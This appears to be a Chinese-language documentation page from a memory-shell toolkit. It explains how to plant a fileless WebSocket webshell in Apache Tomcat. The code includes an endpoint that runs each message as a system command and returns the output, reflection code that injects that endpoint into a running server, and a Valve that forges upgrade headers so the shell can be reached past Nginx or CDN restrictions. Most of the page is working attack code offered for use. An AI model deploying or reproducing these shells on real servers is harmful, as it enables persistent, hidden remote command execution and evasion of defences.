MemShellParty
中间件内存马

Tomcat WebSocket

关于 WebSocket

WebSocket 是一种网络技术,可通过单个 TCP 套接字连接在客户端和服务器之间即时传送双向、全双工信息。它被广泛用于实时应用程序,如聊天应用程序、在线游戏和实时数据流。

Java WebSocket 1.0(JSR 356)是 Java EE 7 的一部分,定义了用于在 Java 平台上创建 WebSocket 应用程序的 API。Tomcat 从版本 7.0.27 开始支持 Java WebSocket API。

定义 Endpoint

JSR 356 定义了两种方式来声明 Endpoint:注解式和接口式。注解式使用注解(如 @ServerEndpoint),而接口式通过实现 Endpoint 类。而注入内存马的场景主要是用于动态添加,因此仅介绍接口式。

import javax.websocket.Endpoint;
import javax.websocket.EndpointConfig;
import javax.websocket.MessageHandler;
import javax.websocket.Session;
import javax.websocket.CloseReason;
import java.io.IOException;

public class ExampleEndpoint extends Endpoint {

    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        System.out.println("连接已打开:" + session.getId());
        session.addMessageHandler(new MessageHandler.Whole<String>() {
            @Override
            public void onMessage(String message) {
                System.out.println("收到消息:" + message);
                try {
                    session.getBasicRemote().sendText("Echo: " + message);
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        });
    }

    @Override
    public void onClose(Session session, CloseReason closeReason) {
        System.out.println("连接关闭:" + session.getId());
    }

    @Override
    public void onError(Session session, Throwable thr) {
        System.out.println("发生错误:" + thr.getMessage());
    }
}

通过继承 javax.websocket.Endpoint 类,在 onOpen 方法中注册消息处理器。

在内存马场景下,可以在 onMessage 方法中添加恶意逻辑,例如执行系统命令或加载其他恶意代码,以下是命令回显 WebSocket Endpoint 示例:

import javax.websocket.Endpoint;
import javax.websocket.EndpointConfig;
import javax.websocket.MessageHandler;
import javax.websocket.Session;
import java.io.InputStream;
import java.util.Scanner;

public class CommandWebSocket extends Endpoint implements MessageHandler.Whole<String> {

    private Session session;

    @Override
    public void onMessage(String cmd) {
        try {
            InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
            session.getBasicRemote().sendText(new Scanner(inputStream).useDelimiter("\\A").next());
        } catch (Throwable e) {
            e.printStackTrace();
        }
    }

    @Override
    public void onOpen(final Session session, EndpointConfig config) {
        this.session = session;
        session.addMessageHandler(this);
    }
}

注册 Endpoint

通过继承 javax.websocket.server.ServerApplicationConfig 实现动态注册 Endpoint:

import javax.websocket.Endpoint;
import javax.websocket.server.ServerApplicationConfig;
import javax.websocket.server.ServerEndpointConfig;
import java.util.HashSet;
import java.util.Set;

public class WebSocketConfig implements ServerApplicationConfig {
    @Override
    public Set<ServerEndpointConfig> getEndpointConfigs(Set<Class<? extends Endpoint>> scannedEndpointClasses) {
        Set<ServerEndpointConfig> result = new HashSet<>();
        ServerEndpointConfig config = ServerEndpointConfig.Builder
                .create(ExampleEndpoint.class, "/api/ws")
                .build();

        result.add(config);

        return result;
    }

    @Override
    public Set<Class<?>> getAnnotatedEndpointClasses(Set<Class<?>> scanned) {
        return scanned;
    }
}

在 Tomcat 中 org.apache.tomcat.websocket.server.WsSci 会扫描并注册实现了 ServerApplicationConfig 的类,从而动态添加 WebSocket Endpoint。

@HandlesTypes({ServerEndpoint.class, ServerApplicationConfig.class,
        Endpoint.class})
public class WsSci implements ServletContainerInitializer {
    @Override
    public void onStartup(Set<Class<?>> clazzes, ServletContext ctx)
            throws ServletException {
        WsServerContainer sc = init(ctx, true);
        // 扫描继承的 ServerApplicationConfig 类,并调用其 getEndpointConfigs 方法
        Set<ServerEndpointConfig> filteredEndpointConfigs = ...;
        try {
            for (ServerEndpointConfig config : filteredEndpointConfigs) {
                sc.addEndpoint(config); 
            }
            // ...
        } catch (DeploymentException e) {
            throw new ServletException(e);
        }
    }

    static WsServerContainer init(ServletContext servletContext, boolean initBySciMechanism) {
        WsServerContainer sc = new WsServerContainer(servletContext);
        servletContext.setAttribute("javax.websocket.server.ServerContainer", sc); 
        // ...
        return sc;
    }
}

代码中有两个关键的地方:

  1. init 方法中,注册的 WsServerContainer 对象会被放入 ServletContext 中,key 为 "javax.websocket.server.ServerContainer",高版本为 "jakarta.websocket.server.ServerContainer"。
  2. 调用 WsServerContainer 的 addEndpoint 方法注册 Endpoint。

因此,我们可以通过 ServletContext 获取 WsServerContainer 对象,初始化 Endpoint 并且构建 ServerEndpointConfig 最后调用 addEndpoint 方法注册我们的恶意 Endpoint。

private void inject(Object context, Object obj) throws Exception {
    Object servletContext = invokeMethod(context, "getServletContext", null, null);
    Object container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"javax.websocket.server.ServerContainer"});
    if (container == null) {
        container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"jakarta.websocket.server.ServerContainer"});
    }

    if (container == null) {
        throw new RuntimeException("container is null");
    }

    if (invokeMethod(container, "findMapping", new Class[]{String.class}, new Object[]{getUrlPattern()}) != null) {
        return;
    }

    ClassLoader contextClassLoader = context.getClass().getClassLoader();
    Class<?> serverEndpointConfigClass;
    Class<?> builderClass;
    try {
        serverEndpointConfigClass = contextClassLoader.loadClass("javax.websocket.server.ServerEndpointConfig");
        builderClass = contextClassLoader.loadClass("javax.websocket.server.ServerEndpointConfig$Builder");
    } catch (ClassNotFoundException e) {
        serverEndpointConfigClass = contextClassLoader.loadClass("jakarta.websocket.server.ServerEndpointConfig");
        builderClass = contextClassLoader.loadClass("jakarta.websocket.server.ServerEndpointConfig$Builder");
    }
    Constructor<?> constructor = builderClass.getDeclaredConstructor(Class.class, String.class);
    constructor.setAccessible(true);
    Object o1 = constructor.newInstance(obj.getClass(), getUrlPattern());
    Object endpointConfig = invokeMethod(o1, "build", null, null);

    invokeMethod(container, "setDefaultMaxTextMessageBufferSize", new Class[]{int.class}, new Object[]{52428800});
    invokeMethod(container, "setDefaultMaxBinaryMessageBufferSize", new Class[]{int.class}, new Object[]{52428800});
    invokeMethod(container, "addEndpoint", new Class[]{serverEndpointConfigClass}, new Object[]{endpointConfig});
}

绕过 Nginx 或 CDN 限制

由于在 Tomcat 中实现 WebSocket 使用的是 Upgrade 协议,因此需要 Upgrade: websocketConnection: upgrade 来将请求转为 WebSocket 连接,Nginx 或 CDN 默认情况下根本不会转发这些头部,甚至会设置 Connection: close 导致无法连接到 WebSocket 内存马。以下是尝试在 Nginx 的情况下连接 WebSocket 所能拿到的请求头部:

host = 127.0.0.1
x-real-ip = 192.168.97.1
x-forwarded-for = 192.168.97.1
x-forwarded-proto = http
connection = close
sec-websocket-version = 13
sec-websocket-key = 4yY8pZQPUv6RlRoPgh7SaA==
sec-websocket-extensions = permessage-deflate; client_max_window_bits

在实现细节上,Tomcat 默认会注册一个名为 org.apache.tomcat.websocket.server.WsFilter 的 Filter,用于将 HTTP 请求升级为 WebSocket 协议。

首先会在 UpgradeUtil.isWebSocketUpgradeRequest 判断请求头里面有没有 Upgrade: websocket 以及是不是 GET 请求。 其次在 UpgradeUtil.doUpgrade 方法中会检查 Connection: upgrade 以及 Sec-WebSocket-Version: 13,如果没有这些头部就会直接返回 400 或 426 错误码。

public class WsFilter implements Filter {
    private WsServerContainer sc;

    public void init(FilterConfig filterConfig) throws ServletException {
        this.sc = (WsServerContainer)filterConfig.getServletContext().getAttribute("javax.websocket.server.ServerContainer");
    }

    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        if (this.sc.areEndpointsRegistered()
                && UpgradeUtil.isWebSocketUpgradeRequest(request, response)) {
            HttpServletRequest req = (HttpServletRequest)request;
            HttpServletResponse resp = (HttpServletResponse)response;
            String pathInfo = ...; // 获取请求路径
            WsMappingResult mappingResult = this.sc.findMapping(path);
            if (mappingResult != null) {
                UpgradeUtil.doUpgrade(this.sc, req, resp, mappingResult.getConfig(), mappingResult.getPathParams());
            }
        }
        chain.doFilter(request, response);
    }
}
public class UpgradeUtil {

    public static boolean isWebSocketUpgradeRequest(ServletRequest request, ServletResponse response) {
        return request instanceof HttpServletRequest
                && response instanceof HttpServletResponse
                && headerContainsToken((HttpServletRequest)request, "Upgrade", "websocket")  
                && "GET".equals(((HttpServletRequest)request).getMethod());
    }

    public static void doUpgrade(WsServerContainer sc, HttpServletRequest req, HttpServletResponse resp, ServerEndpointConfig sec, Map<String, String> pathParams) throws ServletException, IOException {
        String subProtocol = null;
        if (!headerContainsToken(req, "Connection", "upgrade")) { 
            resp.sendError(400);
        } else if (!headerContainsToken(req, "Sec-WebSocket-Version", "13")) { 
            resp.setStatus(426);
            resp.setHeader("Sec-WebSocket-Version", "13");
        }
        // ...
    }
}

结合上面通过 Nginx 转发到 Tomcat 的请求头,可以看到缺失的就是 Upgrade: websocketConnection: upgrade 这两个请求头,导致请求无法进入 WsFilter 的逻辑从而连接失败。因此我们需要创建一个类似 WsFilter 的组件来补充缺失的请求头。考虑到 Filter 和 Valve 的注入代码量,这里选择了更轻量化的 Valve 组件:

public class TomcatWsBypassValve implements Valve {
    public static String headerName;
    public static String headerValue;

    @Override
    public void invoke(Request request, Response response) throws IOException, ServletException {
        try {
            // 因为 Valve 所有请求都会经过,所以需要判断特定流量来防止对业务产生过大的影响
            if (request.getHeader(headerName) != null
                    && request.getHeader(headerName).contains(headerValue)) {
                String pathInfo = request.getPathInfo();
                String path;
                if (pathInfo == null) {
                    path = request.getServletPath();
                } else {
                    path = request.getServletPath() + pathInfo;
                }
                Object sc = request.getServletContext().getAttribute("javax.websocket.server.ServerContainer");
                if (sc == null) {
                    sc = request.getServletContext().getAttribute("jakarta.websocket.server.ServerContainer");
                }
                if (sc == null) {
                    throw new ServletException("Server container not found");
                }
                addHeader(request, "Connection", "upgrade");
                addHeader(request, "Upgrade", "websocket");
                Object mappingResult = sc.getClass().getMethod("findMapping", String.class).invoke(sc, path);
                Class<?> upgradeUtil = Class.forName("org.apache.tomcat.websocket.server.UpgradeUtil");
                for (Method method : upgradeUtil.getMethods()) {
                    if ("doUpgrade".equals(method.getName())) {
                        method.invoke(null, sc, request, response, getFieldValue(mappingResult, "config"), getFieldValue(mappingResult, "pathParams"));
                    }
                }
                return;
            }
        } catch (Throwable e) {
            e.printStackTrace();
        }
        this.getNext().invoke(request, response);
    }

    private void addHeader(Request request, String key, String value) {
        try {
            Field coyoteRequestField = request.getClass().getDeclaredField("coyoteRequest");
            coyoteRequestField.setAccessible(true);
            Object coyoteRequest = coyoteRequestField.get(request);
            Method getMimeHeadersMethod = coyoteRequest.getClass().getMethod("getMimeHeaders");
            Object mimeHeaders = getMimeHeadersMethod.invoke(coyoteRequest);
            Method addValueMethod = mimeHeaders.getClass().getMethod("addValue", String.class);
            Object messageBytes = addValueMethod.invoke(mimeHeaders, key);
            Method setStringMethod = messageBytes.getClass().getMethod("setString", String.class);
            setStringMethod.invoke(messageBytes, value);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private Object getFieldValue(Object obj, String fieldName) throws Exception {
        Field declaredField = obj.getClass().getDeclaredField(fieldName);
        declaredField.setAccessible(true);
        return declaredField.get(obj);
    }

    //...
}

因此我们注入能够绕过 Nginx 或 CDN 限制的 WebSocket 内存马,只需要在注入 WebSocket 内存马的基础上额外注入一个 Valve 内存马。

private void inject(Object context, Object obj) throws Exception {
    Object servletContext = invokeMethod(context, "getServletContext", null, null);
    Object container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"javax.websocket.server.ServerContainer"});
    if (container == null) {
        container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"jakarta.websocket.server.ServerContainer"});
    }

    if (container == null) {
        throw new RuntimeException("container is null");
    }

    if (invokeMethod(container, "findMapping", new Class[]{String.class}, new Object[]{getUrlPattern()}) != null) {
        return;
    }

    Object valve = defineShell(context.getClass().getClassLoader(), getHelperBase64String()).newInstance(); 
    Object pipeline = invokeMethod(context, "getPipeline", null, null); 
    Class valveClass = context.getClass().getClassLoader().loadClass("org.apache.catalina.Valve"); 
    invokeMethod(pipeline, "addValve", new Class[]{valveClass}, new Object[]{valve}); 

    ClassLoader contextClassLoader = context.getClass().getClassLoader();
    Class<?> serverEndpointConfigClass;
    Class<?> builderClass;
    try {
        serverEndpointConfigClass = contextClassLoader.loadClass("javax.websocket.server.ServerEndpointConfig");
        builderClass = contextClassLoader.loadClass("javax.websocket.server.ServerEndpointConfig$Builder");
    } catch (ClassNotFoundException e) {
        serverEndpointConfigClass = contextClassLoader.loadClass("jakarta.websocket.server.ServerEndpointConfig");
        builderClass = contextClassLoader.loadClass("jakarta.websocket.server.ServerEndpointConfig$Builder");
    }
    Constructor<?> constructor = builderClass.getDeclaredConstructor(Class.class, String.class);
    constructor.setAccessible(true);
    Object o1 = constructor.newInstance(obj.getClass(), getUrlPattern());
    Object endpointConfig = invokeMethod(o1, "build", null, null);

    invokeMethod(container, "setDefaultMaxTextMessageBufferSize", new Class[]{int.class}, new Object[]{52428800});
    invokeMethod(container, "setDefaultMaxBinaryMessageBufferSize", new Class[]{int.class}, new Object[]{52428800});
    invokeMethod(container, "addEndpoint", new Class[]{serverEndpointConfigClass}, new Object[]{endpointConfig});
}

相关文档

On this page